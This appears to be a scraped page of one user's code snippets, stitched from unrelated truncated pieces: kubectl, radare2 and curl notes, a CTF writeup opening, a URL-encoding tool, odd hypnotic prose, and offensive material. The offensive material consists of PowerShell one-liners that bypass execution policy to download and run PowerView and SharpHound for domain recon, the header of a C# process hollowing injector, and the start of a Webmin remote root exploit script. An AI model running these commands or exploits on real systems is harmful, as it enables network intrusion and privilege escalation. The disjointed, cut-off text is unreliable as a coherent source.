tanaka tanaka-geek

kubectl one-liners

Enable kubectl completion (needs the bash-completion package):

source <(kubectl completion bash)

Dry-run, outputs Service (--expose) and a Deployment in yaml:

kubectl run --image=apache \ 
--port=80 \

h1-212 CTF Writeup

As an avid CTF'er, I was very much excited when I heard about the H1-212 CTF. Thus, letting my misguided priorities get the better of me, I decided to set my studies aside and try this HackerOne CTF 😄

It didn't take me too long though to realize that I suck at bug bounties and that this challenge wasn't going to be easy...

⚒️ The challenge 🛠️

Agressive URL encode

Python based CLI tool to agressively url-encode strings, rather than just encoding non-url characters this tool will encode every character in the URL.

Usage:

Firstly make a function in your .bash_profile to call the script

function url-encode()
{
 python ~//url_encode.py $@

radare2

load without any analysis (file header at offset 0x0): r2 -n /path/to/file

analyze all: aa
show sections: iS
list functions: afl
list imports: ii
list entrypoints: ie
seek to function: s sym.main

Common Options

-#, --progress-bar Make curl display a simple progress bar instead of the more informational standard meter.

-b, --cookie <name=data> Supply cookie with request. If no =, then specifies the cookie file to use (see -c).

-c, --cookie-jar <file name> File to save response cookies to.

	# Domain Recon
	## ShareFinder - Look for shares on network and check access under current user context & Log to file
	powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess\|Out-File -FilePath sharefinder.txt"

	## Import PowerView Module
	powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')"

	## Invoke-BloodHound for domain recon
	powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"

	A blood black nothingness began to spin.

	Began to spin.

	Let's move on to system.

	System.

	Feel that in your body.


	/***************
	* Simple Process Hollowing in C#
	*
	* #Build Your Binaries
	* c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Hollowing.cs /unsafe
	*
	* @author: Michael Gorelik <smgorelik@gmail.com>
	* gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75
	* #Most of the code taken from here: @github: github.com/ambray

	# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
	# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

	# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
	# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

	# New function naming schema:
	# Verbs:
	# Get : retrieve full raw data sets
	# Find : ‘find’ specific data entries in a data set

	HOST=$1;
	PORT=$2;
	LHOST=$3;
	LPORT=$4;
	if [ $# -lt 4 ]
	then
	echo "Webmin <1.29 remote root exploit by oxagast"
	echo "Priv esc by directory transversal to find cookie in logfile file as root, then session highjack into RCE.";
	echo "Thanks to UmZ for directory transversal attack; greets to enki for asking me to try this!";
	echo "Usage:"